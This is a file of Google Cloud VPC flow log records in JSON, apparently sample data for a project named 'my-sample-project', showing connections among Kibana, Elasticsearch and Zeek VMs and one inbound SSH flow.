-{"insertId":"1gq7q7afe373ek","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.27","dest_port":34536,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373fj","jsonPayload":{"bytes_sent":"137855","connection":{"dest_ip":"10.87.40.76","dest_port":33572,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"72","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_nam
e":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373fm","jsonPayload":{"bytes_sent":"125197","connection":{"dest_ip":"10.87.40.76","dest_port":33540,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"242","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373eg","jsonPayload":{"bytes_sent":"917832","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"230","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373fc","jsonPayload":{"bytes_sent":"55572","connection":{"dest_ip":"198.51.100.88","dest_port":53096,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"133","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373eq","jsonPayload":{"bytes_sent":"4615","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821049800Z","packets_sent":"75","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373ev","jsonPayload":{"bytes_sent":"75612","connection":{"dest_ip":"203.0.113.58","dest_port":65318,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"583","reporter":"SRC","rtt_msec":"96","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373em","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":34536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373ew","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":56478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373e9","jsonPayload":{"bytes_sent":"64140","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"371","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_n
ame":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373f9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373f1","jsonPayload":{"bytes_sent":"231764","connection":{"dest_ip":"10.87.40.76","dest_port":33694,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373ff","jsonPayload":{"bytes_sent":"107878","connection":{"dest_ip":"203.0.113.58","dest_port":65276,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"614","reporter":"SRC","rtt_msec":"156","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373fq","jsonPayload":{"bytes_sent":"595838","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":52430},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"299","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sam
ple-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"14iipwlfd8t01n","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":56410,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"SRC","rtt_msec":"37","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t01j","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":51950,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t01o","jsonPayload":{"bytes_sent":"361966","connection":{"dest_ip":"203.0.113.134","dest_port":33876,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"80","reporter":"SRC","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork
_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t01p","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":51950},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t01e","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":58658,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t01q","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":59924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t01i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":58658},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t01k","jsonPayload":{"bytes_sent":"123732","connection":{"dest_ip":"203.0.113.58","dest_port":65272,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"618","reporter":"SRC","rtt_msec":"123","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t01f","jsonPayload":{"bytes_sent":"76342","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65273},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"710","reporter":"DEST","rtt_msec":"115","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t018","jsonPayload":{"bytes_sent":"9761","connection":{"dest_ip":"192.0.2.73","dest_port":45224,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"end_time":"2019-06-14T03:44:23.955039461Z","packets_sent":"13","reporter":"SRC","rtt_msec":"242","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t01a","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":56410},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"DEST","rtt_msec":"37","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t017","jsonPayload":{"bytes_sent":"51612","connection":{"dest_ip":"203.0.113.58","dest_port":65277,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"615","reporter":"SRC","rtt_msec":"95","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01m","jsonPayload":{"bytes_sent":"74330","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65272},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"745","reporter":"DEST","rtt_msec":"123","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t015","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"203.0.113.12","dest_port":59924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01h","jsonPayload":{"bytes_sent":"76622","connection":{"dest_ip":"203.0.113.58","dest_port":65273,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"599","reporter":"SRC","rtt_msec":"115","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t019","jsonPayload":{"bytes_sent":"42","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.0.2.73","src_port":45224},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:24.922448897Z","packets_sent":"5","reporter":"DEST","rtt_msec":"242","src_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 